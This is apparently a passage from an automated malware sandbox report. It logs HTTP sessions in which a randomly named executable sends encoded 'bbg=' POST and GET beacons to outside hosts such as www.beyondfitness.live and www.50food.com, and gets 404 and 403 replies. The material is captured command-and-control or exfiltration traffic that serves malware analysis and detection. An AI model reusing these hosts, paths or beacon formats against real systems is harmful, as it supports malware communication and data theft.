                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      31192.168.2.550029209.74.77.107804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:58.319639921 CET815OUTPOST /2eo9/ HTTP/1.1
                                                                                      Host: www.beyondfitness.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.beyondfitness.live
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.beyondfitness.live/2eo9/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 32 56 4f 54 62 74 6f 72 35 39 61 68 45 4d 7a 37 54 6e 6c 75 6d 72 32 67 69 54 4d 55 61 57 74 4c 6c 72 69 7a 37 75 56 43 38 30 4d 31 59 33 50 62 47 46 4a 76 53 33 30 36 46 7a 68 32 56 63 62 58 56 73 57 4c 72 38 4d 41 4c 50 69 32 4b 7a 51 43 62 78 71 2f 6e 6e 37 36 6a 72 79 43 43 6b 6f 77 45 4d 70 45 78 58 59 51 43 35 6e 41 7a 6c 50 78 32 41 42 44 58 6b 7a 56 69 59 4e 48 37 6d 74 44 4c 53 43 50 4a 45 69 34 38 31 78 49 31 54 56 53 53 53 78 55 43 4b 45 59 62 4b 37 47 42 47 4f 43 64 65 66 4b 65 63 77 5a 67 4f 68 51 30 55 33 30 4c 41 34 70 38 57 56 48 4d 2f 4b 67 36 73 41 32 72 66 56 38 6d 41 48 33 61 32 4d 67 33 6e 74 79 65 47 56 33 72 45 77 57 59 78 74 77
                                                                                      Data Ascii: bbg=2VOTbtor59ahEMz7Tnlumr2giTMUaWtLlriz7uVC80M1Y3PbGFJvS306Fzh2VcbXVsWLr8MALPi2KzQCbxq/nn76jryCCkowEMpExXYQC5nAzlPx2ABDXkzViYNH7mtDLSCPJEi481xI1TVSSSxUCKEYbK7GBGOCdefKecwZgOhQ0U30LA4p8WVHM/Kg6sA2rfV8mAH3a2Mg3ntyeGV3rEwWYxtw
                                                                                      Jan 10, 2025 19:53:59.566045046 CET533INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 10 Jan 2025 18:53:59 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      32192.168.2.550030209.74.77.107804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:00.881843090 CET1832OUTPOST /2eo9/ HTTP/1.1
                                                                                      Host: www.beyondfitness.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.beyondfitness.live
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.beyondfitness.live/2eo9/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 32 56 4f 54 62 74 6f 72 35 39 61 68 45 4d 7a 37 54 6e 6c 75 6d 72 32 67 69 54 4d 55 61 57 74 4c 6c 72 69 7a 37 75 56 43 38 30 55 31 59 68 62 62 55 7a 42 76 54 33 30 36 45 7a 68 33 56 63 62 77 56 73 65 51 72 38 42 37 4c 4d 61 32 4c 57 63 43 54 6b 47 2f 75 6e 37 36 76 4c 79 35 64 30 6f 35 45 4e 5a 49 78 55 67 51 43 35 6e 41 7a 6e 58 78 2f 78 42 44 59 45 7a 61 68 59 4e 44 74 57 73 65 4c 53 71 31 4a 45 6d 6f 39 42 46 49 31 7a 6c 53 66 42 56 55 59 4b 45 57 4f 4b 36 44 42 47 7a 63 64 65 53 37 65 59 35 45 67 4e 78 51 33 79 58 74 57 54 4d 4c 71 57 56 6f 4a 64 53 47 6d 61 51 79 31 4f 52 4e 36 51 62 4c 51 6b 6b 77 30 48 64 57 66 79 63 6f 30 79 51 67 65 31 49 5a 6c 57 63 70 43 2b 76 36 5a 55 4d 6f 69 6e 57 67 61 52 30 71 48 44 67 50 51 45 38 66 43 30 6c 61 41 36 48 37 5a 36 34 52 4c 6c 70 43 55 71 79 75 30 6d 52 65 48 74 33 6c 57 64 68 5a 77 6e 53 69 76 72 68 31 38 58 33 34 6d 4f 36 4c 46 54 2b 31 44 50 61 49 63 63 66 49 50 50 4d 70 36 4c 58 32 58 4a 43 5a 4e 64 57 6a 4e 37 55 48 6a 53 41 74 30 37 [TRUNCATED]
                                                                                      Data Ascii: bbg=2VOTbtor59ahEMz7Tnlumr2giTMUaWtLlriz7uVC80U1YhbbUzBvT306Ezh3VcbwVseQr8B7LMa2LWcCTkG/un76vLy5d0o5ENZIxUgQC5nAznXx/xBDYEzahYNDtWseLSq1JEmo9BFI1zlSfBVUYKEWOK6DBGzcdeS7eY5EgNxQ3yXtWTMLqWVoJdSGmaQy1ORN6QbLQkkw0HdWfyco0yQge1IZlWcpC+v6ZUMoinWgaR0qHDgPQE8fC0laA6H7Z64RLlpCUqyu0mReHt3lWdhZwnSivrh18X34mO6LFT+1DPaIccfIPPMp6LX2XJCZNdWjN7UHjSAt07vVKMVJpQYSepIexQ/No7C0BuHgFSdC7QZBBz2HTMUTgkGlMOQo6np9UZgneH8nR7kVaicnhqZn8M13DuJRaAVR35uNYgJr0geyjmcF1tbwzTNNcMwpcZW6+M5k4k0hfOeqFDz+up/yK/umGtIZCDIfO4E1djhjdeklnQE+ZUw3TrU5hHINP7X/1NpKoWSfM6Ds5meV2ufFass1YvR4vFkLrpV7kTpW56jr38Jz8eVx8fXpx/Z3A3JCkvh+Td+thhG78tIaZRgE9qKPMh+9M0jTprhYJFj13giytx9+3ha2MUuKkASsa4nvjaTex4Y+jvWhQCNbdfmCWuKcsb2B1HXpZIJjRnVh0GoFbDHF9i7rIB5RnW5DDzv/lvvQA8Prj34Az1YYMIBCQry/zgqi1FEwAsSShZxwec70x8HiwWJ8r5tdAAiUk5R0KIW5TiXdpmiRsZ1lrGzu/B6friA2qSzLNos+wchdF1Zl7/mGRmNP50F0DJIWhMUe+rtzzY9j6v1ksKG22hpWoiaPd+AEIVug5Qs3vn6DLIKika/gHaM3NIeDhyHxDybnwbG8GtiRebv/iYQGQBP8P40ce09ZhdlrXfa7xJ9W622dUO4gkvDiMMHF3hAmGXnizKwyqIMuSsaxoNI3UToQudwZ4XZggmgYLXhC9Gp+nGJX [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:02.179037094 CET533INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 10 Jan 2025 18:54:01 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      33192.168.2.550031209.74.77.107804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:03.436743975 CET529OUTGET /2eo9/?4Hph=tXCXkpKPT&bbg=7XmzYZMr38GxQ9PAC0sOj6+qqhhrckRH6Nq2/pV9l30WNGyrAQ9CTyNBBx9RcOn2QODlxsxyZKKfc2UgMRuej2Phu9qscykKfItb6htlbLHkk3vv6Dp9SyXAhpxA8WVGQQ== HTTP/1.1
                                                                                      Host: www.beyondfitness.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:04.620337963 CET548INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 10 Jan 2025 18:54:04 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      34192.168.2.550032147.255.21.187804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:10.225976944 CET771OUTPOST /29r3/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.50food.com
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.50food.com/29r3/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 36 45 66 5a 32 33 41 79 76 33 35 6a 37 34 57 68 67 77 2f 36 6a 43 53 49 65 42 41 2f 73 32 7a 44 4f 6f 6b 6d 6b 77 62 65 67 49 69 47 43 54 64 2b 58 54 63 38 57 76 74 6f 55 6b 78 44 62 4e 48 55 6b 48 48 43 71 65 2b 46 59 55 56 74 53 55 51 37 78 6c 75 53 33 61 43 51 6d 75 76 63 70 69 7a 78 59 47 6d 61 32 59 6d 44 53 55 64 6b 74 4b 35 69 77 38 63 57 69 6b 4a 66 67 54 52 6b 64 65 59 37 38 63 2b 38 47 56 4c 65 37 4a 51 66 5a 35 52 47 79 34 7a 47 74 79 41 68 4e 4b 48 6a 55 6f 4a 55 37 41 70 79 30 37 4d 65 4e 4c 74 58 2f 61 35 54 68 6c 6e 36 61 69 42 79 4b 70 4f 77 36 66 65 69 4e 34 6d 50 6e 38 34 3d
                                                                                      Data Ascii: bbg=6EfZ23Ayv35j74Whgw/6jCSIeBA/s2zDOokmkwbegIiGCTd+XTc8WvtoUkxDbNHUkHHCqe+FYUVtSUQ7xluS3aCQmuvcpizxYGma2YmDSUdktK5iw8cWikJfgTRkdeY78c+8GVLe7JQfZ5RGy4zGtyAhNKHjUoJU7Apy07MeNLtX/a5Thln6aiByKpOw6feiN4mPn84=
                                                                                      Jan 10, 2025 19:54:10.812429905 CET309INHTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:07 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      35192.168.2.550033147.255.21.187804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:12.780946970 CET791OUTPOST /29r3/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.50food.com
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.50food.com/29r3/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 36 45 66 5a 32 33 41 79 76 33 35 6a 36 62 4f 68 6d 54 58 36 79 69 53 4a 53 68 41 2f 6d 57 7a 48 4f 6f 6f 6d 6b 79 32 44 6e 36 57 47 43 33 4e 2b 57 52 34 38 58 76 74 6f 62 30 78 47 66 4e 48 66 6b 48 62 38 71 66 43 46 59 55 70 74 53 55 41 37 78 57 57 4e 32 4b 43 53 71 4f 76 43 6e 43 7a 78 59 47 6d 61 32 59 79 6c 53 56 31 6b 74 36 4a 69 7a 64 64 6b 68 6b 4a 63 6c 54 52 6b 4d 75 59 2f 38 63 2f 47 47 58 75 35 37 4c 59 66 5a 36 46 47 7a 70 7a 48 69 79 41 64 53 61 47 72 62 4e 51 46 69 6a 4e 6c 72 64 5a 6f 4f 61 70 5a 36 73 49 35 37 48 76 53 4a 43 74 4b 61 36 47 48 72 76 2f 4c 58 62 32 2f 35 72 75 4c 71 37 67 2b 4b 6c 34 4f 66 6e 36 73 73 46 33 38 65 4b 74 75
                                                                                      Data Ascii: bbg=6EfZ23Ayv35j6bOhmTX6yiSJShA/mWzHOoomky2Dn6WGC3N+WR48Xvtob0xGfNHfkHb8qfCFYUptSUA7xWWN2KCSqOvCnCzxYGma2YylSV1kt6JizddkhkJclTRkMuY/8c/GGXu57LYfZ6FGzpzHiyAdSaGrbNQFijNlrdZoOapZ6sI57HvSJCtKa6GHrv/LXb2/5ruLq7g+Kl4Ofn6ssF38eKtu
                                                                                      Jan 10, 2025 19:54:13.388597012 CET309INHTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:09 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      36192.168.2.550034147.255.21.187804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:15.331478119 CET1808OUTPOST /29r3/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.50food.com
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.50food.com/29r3/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 36 45 66 5a 32 33 41 79 76 33 35 6a 36 62 4f 68 6d 54 58 36 79 69 53 4a 53 68 41 2f 6d 57 7a 48 4f 6f 6f 6d 6b 79 32 44 6e 36 4f 47 43 41 6c 2b 5a 52 45 38 51 76 74 6f 59 30 78 48 66 4e 48 43 6b 48 54 34 71 66 4f 37 59 52 74 74 64 57 34 37 33 6e 57 4e 38 4b 43 53 33 65 76 44 70 69 7a 6f 59 47 57 47 32 59 69 6c 53 56 31 6b 74 35 52 69 6e 38 64 6b 6e 6b 4a 66 67 54 52 34 64 65 5a 59 38 59 72 38 47 58 37 4f 36 34 67 66 5a 63 6c 47 77 62 72 48 39 43 41 6c 52 61 47 61 62 4e 56 64 69 6a 68 66 72 64 46 43 4f 64 6c 5a 35 4c 5a 6d 76 44 6e 56 64 6a 5a 63 59 71 2b 2b 73 2f 2f 58 58 61 61 4f 32 34 47 34 33 6f 6f 63 42 41 38 2b 55 33 33 46 39 7a 47 6e 4d 2b 59 6a 50 57 68 5a 2b 43 72 4c 72 72 4d 78 78 71 4f 2b 72 36 59 31 4c 72 57 49 4b 6c 36 32 6a 52 7a 73 52 77 4c 65 67 61 44 6c 32 49 61 31 45 6a 44 65 4a 6f 68 44 4a 4c 79 46 51 7a 4f 55 56 4b 4d 2f 6f 6c 53 75 55 42 63 41 68 4c 77 4f 50 64 43 41 34 61 4d 4c 4d 33 79 37 58 4c 4d 59 34 62 36 57 52 61 71 47 43 6c 32 56 48 74 79 6a 56 44 31 4f 63 78 [TRUNCATED]
                                                                                      Data Ascii: bbg=6EfZ23Ayv35j6bOhmTX6yiSJShA/mWzHOoomky2Dn6OGCAl+ZRE8QvtoY0xHfNHCkHT4qfO7YRttdW473nWN8KCS3evDpizoYGWG2YilSV1kt5Rin8dknkJfgTR4deZY8Yr8GX7O64gfZclGwbrH9CAlRaGabNVdijhfrdFCOdlZ5LZmvDnVdjZcYq++s//XXaaO24G43oocBA8+U33F9zGnM+YjPWhZ+CrLrrMxxqO+r6Y1LrWIKl62jRzsRwLegaDl2Ia1EjDeJohDJLyFQzOUVKM/olSuUBcAhLwOPdCA4aMLM3y7XLMY4b6WRaqGCl2VHtyjVD1OcxFHSjYOvwoxM3Q2m1rwv8/b9zmV7942E43X2znyUUqPaR/5D2OMnD+XiRyB+AuaW9PJB+WyticxzK8pB337vhClzAvynLQEsw0IfK1FlPszGaiVl2CV0qtAtq/dhslXqAD4u/htX/qImW6mnLbDHs4AfKI3YYSTBmaygU8nX+csVymIs9hIbP90Yhr20Er1FMONe8cxLN/+bbzBnsk6IMuw6MJKqMqp4g/MqJ8y2BONJpkDBKxj20yBtMVYgtR7e+s3YzBZqjUxdW7LuUKrdwmBcFKg9gEQkzqNiaI5I+45N5CIMypcNfCpOtJRJuiiTOttLpNUh0hAHK9cGQih+OK5np77olbbpPnr7+5PD51XjQf/C7PDGKP67muDL/z0/pYFG4ZOR7vkxmnnY/chHKDMIHI7TzA5T33T4qgquX1s26szDxLNA6R6CNeH5vz89W/2FMIfBQgrd+LBzGwmDNrAfX20cGBCiAB2SKhh+pGdGma03xsn2KVBDESakXehnL7PxxKF5l7tUbH4PSGXGkQ9I8ZZ029vk7OzckI2GIiad5r5/z/LiuMhwB7VcxWhEjDY8nCfehg+RlfIIxLnN725gqsDOrGaZpdxexAZaxKCaU5ImoN0WHAxtdte77WsPbVpOVj+vFbm+hIeVukHrxtxGlDagzyhNICM [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:15.952819109 CET309INHTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:12 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      37192.168.2.550035147.255.21.187804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
